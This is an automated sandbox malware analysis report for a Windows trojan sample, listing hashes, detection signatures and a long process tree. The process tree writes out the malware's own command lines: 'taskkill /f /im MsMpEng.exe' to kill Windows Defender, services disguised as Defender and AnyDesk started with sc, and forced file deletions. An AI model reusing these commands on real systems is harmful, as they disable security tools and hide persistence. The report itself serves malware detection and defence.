
Windows Analysis Report
SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Analysis ID: 1521703
MD5: 95408095927f78deffaeb9cb1f4cd44d
SHA1: 5e98f7cc5b8bce4dcefddc0313fe1ccc15ffe08c
SHA256: 0c7b1dafed4420aab551544f4ca8813f1556e19442f75046b00bb0c952215456
Tags: exe

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates files in the system32 config directory
Drops executables to the windows directory (C:\Windows) and starts them
Excessive usage of taskkill to terminate processes
Uses taskkill to terminate AV processes
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe" MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
    • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • MicrosoftWindowsDefenderCoreService.exe (PID: 6636 cmdline: "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install MD5: 9CEBC167FF7C8AE3CCFFB718FD7B52D0)
      • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskCrashHandler.exe (PID: 5996 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
        • cmd.exe (PID: 4600 cmdline: C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5660 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • Conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4544 cmdline: C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 4236 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • Conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AnyDeskCrashHandler.exe (PID: 6080 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
      • cmd.exe (PID: 1484 cmdline: C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3748 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • cmd.exe (PID: 3792 cmdline: C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7024 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • MicrosoftWindowsDefenderCoreService.exe (PID: 2128 cmdline: "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" MD5: 9CEBC167FF7C8AE3CCFFB718FD7B52D0)
    • AnyDeskCrashHandler.exe (PID: 6636 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
    • cmd.exe (PID: 6996 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 2976 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 2732 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3220 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3984 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1088 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6628 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 1780 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5712 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3744 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5024 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 4892 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 5340 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 572 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3172 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3756 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3852 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 7052 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 6324 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 420 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1600 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5748 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3540 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 6928 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 6216 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • Conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5016 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5908 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 4876 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5564 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AnyDeskUpdateService.exe (PID: 4048 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
        • cmd.exe (PID: 5464 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6484 cmdline: "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3532 cmdline: sc start AnyDeskUpdateService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AnyDeskUpdateService.exe (PID: 6552 cmdline: "C:\Windows\System32\oobe\AnyDeskUpdateService.exe" MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
    • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AnyDeskCrashHandler.exe (PID: 4196 cmdline: "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552 MD5: 8EB4565C6C7096C17AC94718B2A3724B)
    • cmd.exe (PID: 5908 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4232 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4876 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AnyDeskUpdateService.exe (PID: 5908 cmdline: C:\Windows\System32\oobe\AnyDeskUpdateService.exe install MD5: 95408095927F78DEFFAEB9CB1F4CD44D)
          • cmd.exe (PID: 1944 cmdline: C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5656 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1880 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 3796 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3792 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3748 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4072 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5916 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1592 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1408 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1944 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • Conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1212 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3404 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • Conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5916 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6316 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5156 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6248 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7004 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 2168 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5996 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5320 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5608 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5100 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4892 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2404 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1484 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4832 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5164 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4072 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 2120 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1812 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2836 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2036 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • Conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5036 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1132 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6212 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
